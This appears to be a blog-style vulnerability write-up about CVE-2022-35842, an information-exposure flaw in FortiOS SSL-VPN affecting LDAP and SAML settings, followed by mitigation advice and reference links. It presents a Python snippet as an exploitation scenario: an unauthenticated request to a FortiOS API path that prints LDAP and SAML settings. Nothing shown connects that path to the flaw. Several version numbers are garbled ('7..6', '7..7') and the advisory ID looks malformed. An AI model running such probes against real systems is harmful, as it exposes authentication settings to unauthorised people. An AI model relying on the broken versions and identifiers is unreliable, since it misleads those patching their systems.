CVE-2022-35842: FortiOS SSL-VPN Sensitive Information Exposure Vulnerability in LDAP and SAML Settings

A recently discovered security vulnerability, CVE-2022-35842, has been identified, which affects Fortinet's FortiOS SSL-VPN. This vulnerability is categorized as "CWE-200: Information Exposure" and impacts versions 7.2., versions 7.. through 7..6, and versions 6.4. through 6.4.9. The issue arises from the exposure of sensitive LDAP and SAML settings leading to potential unauthorized access and information disclosure. In this post, we will provide an overview of the vulnerability, its potential impact, code snippets, and links to original references for those who require further reading.

Exploit Details

The vulnerability (CVE-2022-35842) in FortiOS SSL-VPN allows a remote unauthenticated attacker to potentially gain access to sensitive information about LDAP and SAML settings configured in the system. This is accomplished by exploiting an information exposure weakness in the affected versions of the software. The attacker could then potentially use this information to target other systems or applications that are integrated with FortiOS, jeopardizing the security of the entire infrastructure.

Here's a code snippet demonstrating a possible exploitation scenario

import requests

target_url = 'https://target-fortios-sslvpn-url/';

response = requests.get(target_url + 'api/v2/cmdb/system/setting')

if response.status_code == 200:
    ldap_settings = response.json().get('ldap')
    saml_settings = response.json().get('saml')

    print('LDAP Settings:', ldap_settings)
    print('SAML Settings:', saml_settings)
else:
    print('Failed to retrieve settings, perhaps the target is not vulnerable or has already been patched.')

In this example, the code sends an HTTP GET request to a target FortiOS SSL-VPN instance. If the system is vulnerable, the script will retrieve and display the LDAP and SAML settings, potentially exposing sensitive information to an unauthorized actor.

Mitigation

To mitigate this vulnerability, users of the affected versions of FortiOS should take the following steps:

1. Update their FortiOS system to the latest version, as mentioned in the Fortinet Security Advisory (FG-IR-SA-5791-623). The fixed versions are 7..7, 6.4.10, and 7.2.1.

2. Regularly review and follow the Fortinet best practice guides to ensure a secure deployment of FortiOS.

3. Limit the exposure of sensitive information by implementing proper access control and network segmentation policies.

4. Continuously monitor and log activities on FortiOS systems to detect any unauthorized access or unusual behavior.

Conclusion

The information exposure vulnerability, CVE-2022-35842, affecting Fortinet's FortiOS SSL-VPN requires immediate attention to safeguard sensitive LDAP and SAML settings. By updating the software to the latest patched versions and following best practices, organizations can ensure the security of their FortiOS systems. It's essential to always keep security infrastructure up to date and continuously monitor activities to identify and prevent potential threats.

Original References

- CVE-2022-35842: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35842
- CWE-200: https://cwe.mitre.org/data/definitions/200.html
- Fortinet Security Advisory FG-IR-SA-5791-623: https://www.fortiguard.com/psirt/FG-IR-SA-5791-623
- Fortinet Best Practices: https://docs.fortinet.com/document/fortigate/7../best-practices-for-securing-your-fortigate

Timeline

Published on: 11/02/2022 12:15:00 UTC
Last modified on: 08/08/2023 14:21:00 UTC